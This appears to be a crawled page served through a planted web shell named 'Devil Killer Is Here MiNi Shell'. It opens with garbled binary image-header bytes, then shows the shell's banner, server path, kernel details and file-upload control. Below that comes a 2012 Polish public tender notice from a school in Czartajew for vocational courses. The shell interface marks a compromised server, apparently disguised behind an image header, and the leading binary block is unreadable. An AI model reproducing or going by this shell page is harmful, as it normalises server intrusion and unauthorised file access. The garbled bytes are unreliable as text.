JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121228/531512-N-2012.html

<p class="kh_header"><b>Czartajew: Organizacja i realizacja specjalistycznych kursów w ramach projektu Od ucznia do profesjonalisty realizowanego przez Zespół Szkół Rolniczych im. W. St. Reymonta w Czartajewie, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego ze środków Unii Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki. Nr. Umowy: UDA-POKL.09.02.00-20-198/12-00</b><br>
<b>Numer ogłoszenia: 531512 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Rolniczych im. W. St. Reymonta , ul. Długa 130, 17-300 Czartajew, woj. podlaskie, tel. 85 655 28 70, faks 85 655 28 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsr-czartajew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i realizacja specjalistycznych kursów w ramach projektu Od ucznia do profesjonalisty realizowanego przez Zespół Szkół Rolniczych im. W. St. Reymonta w Czartajewie, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego współfinansowanego ze środków Unii Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki. Nr. Umowy: UDA-POKL.09.02.00-20-198/12-00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i realizacja szkoleń w ramach projektu Od ucznia do profesjonalisty realizowanego przez Zespół Szkół Rolniczych im. W. St. Reymonta w Czartajewie, którego beneficjentem jest Powiat Siemiatycki w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego tj.: 


Zadanie I - Kurs specjalistyczny z zakresu obsługi programu typu AutoCad, obejmujący następujący zakres wiadomości i umiejętności: Zdobycie przez słuchacza wiedzy i umiejętności związanych z posługiwaniem się programem typu AutoCAD. Nabyciem umiejętności tworzenia rysunku technicznego, prawidłowego wymiarowania, kreskowania i wydruku. 
Kurs zostanie objętych 40 uczniów (4 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu.


Zadanie II- Specjalistyczny kurs zawodowy z florystyki  Malowaniem kwiatami obejmuje: zapoznanie uczestników kursu z zagadnieniami z zakresu florystyki i pozwala nabyć podstawowe umiejętności rozwijające zdolności kreatywne. Kurs powinien dotyczyć:
1) Historii dekoracji roślinnych
2) Materiału roślinnego
3) Poznania podstawowych technik w pracy florysty.
4) Nauki układania bukietów na różne okazje - środki techniczne i materiały dekoracyjne 
5) Bukietów okolicznościowych
6) Dekoracji florystycznej ślubu: stół kościół, samochody sala bankietowa.
7) Kompozycji kwiatowych w naczyniach 
8) Pielęgnacji roślin i kwiatów doniczkowych 
9) Sztuki kupowania
10) Sztuki sadzenia, podlewania, nawożenia
11) Nauki wyboru roślin ozdobnych w zależności od charakteru wnętrza
Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 50 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem niezbędnych materiałów szkoleniowych gwarantujących efektywne przyswajanie wiedzy i nabywanie umiejętności. Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu.


Zadanie III- Specjalistyczny kurs zawodowy z wykorzystaniem ICT  Techniki graficzne obejmujący następujący zakres wiadomości: uczestnicy kursu nabędą umiejętności w zakresie obróbki zdjęć i tworzenia własnych projektów graficznych przy użyciu technologii informacyjnej.

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem niezbędnych materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika), trenerów. Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu.


Zadanie IV- Kurs obsługi programowania obrabiarek sterowanych numerycznie 
Program kursu w zakresie obsługi i programowania obrabiarek sterowanych numerycznie adresowany jest do uczniów uczących się zawody technik mechanik. Ma na celu przygotowanie uczestników szkolenia w zakresie: przestrzegania przepisów bhp i ppoż podczas obsługi maszyn i urządzeń, podstaw technologii skrawania, identyfikacji dokumentacji technicznej i technologicznej, wykorzystania specjalistycznego oprogramowania komputerowego CAD/CAM, przygotowania dokumentacji w programie CAD/CAM, projektowania procesu technologicznego oraz parametrów obróbki skrawaniem, programowania obrabiarek CNC, obsługi obrabiarek CNC, przenoszenie programów roboczych z komputera na maszyny.

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu. Z uwagi na brak możliwości zorganizowania kursu w siedzibie Zamawiającego powinien on być zorganizowany przez Wykonawcę we własnej siedzibie lub w formie wyjazdowej: 5 wyjazdów po 8 godzin w dni wolne od zajęć lekcyjnych. Dla uczestników kursu wraz z opiekunem należy zapewnić transport do miejsca odbywania szkolenia, oraz catering. Catering powinien obejmować:
1.poczęstunek ( herbata, ciastka/ciasto, pączki)- serwowany podczas przerw między zajęciami
2.obiad składający się z dwóch dań ( zupa, drugie danie i kompot)


Zadanie V - Specjalistyczny kurs zawodowy z przedsiębiorczości  Asystent rachunkowości- dobry zawód, obejmujące następujący zakres wiadomości: gromadzenie, przeliczanie dokumentów i danych związanych z księgowością , finansami i obsługą kasy fiskalnej. 

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 60 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu.
Szczegółowy opis przedmiotu zamówienia:
1. W ramach organizacji i realizacji szkolenia wykonawca ma obowiązek zapewnić Wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia szkoleń, tj. osoby które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację szkolenia stanowiącego przedmiot zamówienia, którzy przeprowadzili co najmniej jedno szkolenie z zakresu objętego przedmiotem zamówienia. Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć. 
2. W ramach organizacji i realizacji szkolenia wykonawca będzie odpowiedzialny za przystosowanie sal szkoleniowych udostępnionych przez zamawiającego do prowadzenia zajęć zgodnie z zasadami obowiązującymi w tym zakresie. 
3. W ramach organizacji i realizacji szkolenia wykonawca ma obowiązek zapewnić indywidualne materiały szkoleniowe dla uczestników szkoleń (jeden komplet dla każdego uczestnika) odpowiadające zakresowi merytorycznemu szkolenia, w postaci: podręcznika lub skryptu w swej treści w sposób wyczerpujący odnoszącego się do zakresu programu szkolenia wykorzystywanego w ramach zajęć, które na pierwszych zajęciach przekaże każdemu z uczestników na własność.
4. Wykonawca w porozumieniu z Zamawiającym będzie realizował odpowiednie działania informacyjne i promocyjne zgodne z Wytycznymi dotyczącymi realizacji projektów współfinansowanych z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, polegające na m.in.: oznaczeniu budynku i pomieszczeń, w których realizowane będą szkolenia plakatami z informacją o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (wraz z logo POKL, UE i EFS); umieszczaniu logo i nazwy projektu, logo POKL, UE i EFS oraz informacji o współfinansowaniu projektu z EFS na dokumentach takich jak: korespondencja dotycząca projektu, materiały szkoleniowe, listy obecności, protokoły egzaminacyjne, ankiety ewaluacyjne itp.
5. Wykonawca wyda wszystkim uczestnikom szkoleń, którzy wzięli udział w co najmniej 80% czasu zajęć, certyfikaty o ukończeniu szkolenia potwierdzające ukończenie szkolenia oraz udział w projekcie. Na zaświadczeniach powinny zostać umieszczone właściwe oznaczenia graficzne: logo i nazwy projektu, logo POKL, UE, EFS i wraz z tekstami opisującymi zaangażowanie środków UE w projekt.
Zamawiający zastrzega sobie prawo zapoznania się przed rozpoczęciem szkoleń (a w trakcie ich realizacji kontroli) z warunkami oferowanymi przez Wykonawcę. W przypadku, gdy oferowane warunki będą odbiegać od wymogów Zamawiającego, Wykonawca zobowiązany jest usunąć uchybienia w ciągu 3 dni roboczych pod sankcją wypowiedzenia umowy na realizację zamówienia.
Wykonawca obowiązany jest także do:
1. Prowadzenia dziennika zajęć i listy obecności na zajęciach oraz dostarczenie ich do Zamawiającego po zakończeniu szkolenia dla każdej z grup;
2. Bieżącego informowania Zamawiającego o ewentualnych trudnościach na etapie realizacji szkolenia, zakończeniu szkolenia oraz jego wynikach;
3. Poddawania się kontroli prawidłowości realizacji projektu dokonywanej przez Zamawiającego oraz inne uprawnione do tego instytucje, w tym wglądu do wszelkiej dokumentacji związanej z projektem;
4. Przekazania po zakończeniu szkolenia do Zamawiającego kopii, dokumentów potwierdzających ukończenie szkolenia oraz imiennego wykazu osób, które nie ukończyły szkolenia;
5. Przechowywania wszystkich dokumentów związanych z realizacją szkolenia co najmniej do dnia 31.12.2020 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.51.00.00-2, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium o wartości:
- dla części I zamówienia: 500,00 zł (słownie: pięćset złotych),
- dla części II zamówienia: 400,00 zł (słownie: czterysta złotych),
- dla części III zamówienia: 400,00 zł (słownie: czterysta złotych),
- dla części IV zamówienia: 500,00 zł (słownie: pięćset złotych),
- dla części V zamówienia: 500,00 zł (słownie: pięćset złotych).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 103, poz. 1158 ze zm.).
3. Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego:
w Banku PKO BP SA, numer rachunku: 03 1020 1332 0000 1702 0037 5188 , z dopiskiem Wadium - szkolenia w projekcie Od ucznia do profesjonalisty - cz.___ zamówienia.
4. Wadium wnoszone w formach, o których mowa w pkt 7.2 lit. b - e, należy złożyć w formie oryginału w siedzibie Zamawiającego, (sekretariat)  w terminie wyznaczonym do składania ofert w zamkniętej kopercie. Kopertę należy opisać nazwą i adresem Wykonawcy oraz zaadresować do Zamawiającego oraz opisać adnotacją Wadium - szkolenia w projekcie Od ucznia do profesjonalisty, NIE OTWIERAĆ PRZED TERMINEM 8.01.2013 r. godz. 12:30.
5. Gwarancja wadialna musi być podpisana przez upoważnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji (poręczenia) winno wynikać bezwarunkowe, skuteczne na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.
7. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w terminie wyznaczonym do składania ofert znajdzie się (zostanie zaksięgowane) na rachunku bankowym Zamawiającego.
8. Potwierdzenie wniesienia wadium w pieniądzu należy dołączyć do oferty.
9. Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
10. Wykonawca, którego oferta została wybrana, straci wadium wraz z odsetkami w przypadku, gdy:
a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) nie wniesie zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, tj. przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
a) co najmniej 3 usługi szkoleniowe (każda realizowana na podstawie odrębnej umowy), polegające na organizacji i przeprowadzaniu szkoleń grupowych, o liczbie uczestników co najmniej 20 osób i o wartości co najmniej 16 000,00 zł każda, w tym co najmniej jedna usługa z zakresu szkoleń informatycznych lub z zakresu szkoleń zawodowych - zgodnych z zakresem tematycznym przedmiotu zamówienia. Należy dołączyć dokumenty potwierdzające że usługi zostały wykonane lub są wykonywane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia tj. przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami :
a) co najmniej 2 (dwoma) osobami do każdego zadania, posiadającymi: wiedzę i doświadczenie w realizacji szkoleń z danego zakresu oraz przeprowadzili co najmniej 1 szkolenie z zakresu tematycznego objętego daną częścią zamówienia, do realizacji której zostali przewidziani.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca przedstawi:
a) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości co najmniej 50 000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
b) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia jeżeli Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsr-czartajew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Rolniczych im. W. St. Reymonta ul. Długa 130 Czartajew, 17-300 Siemiatycze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2013 godzina 12:00, miejsce: Zespół Szkół Rolniczych im. W. St. Reymonta ul. Długa 130 Czartajew, 17-300 Siemiatycze Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
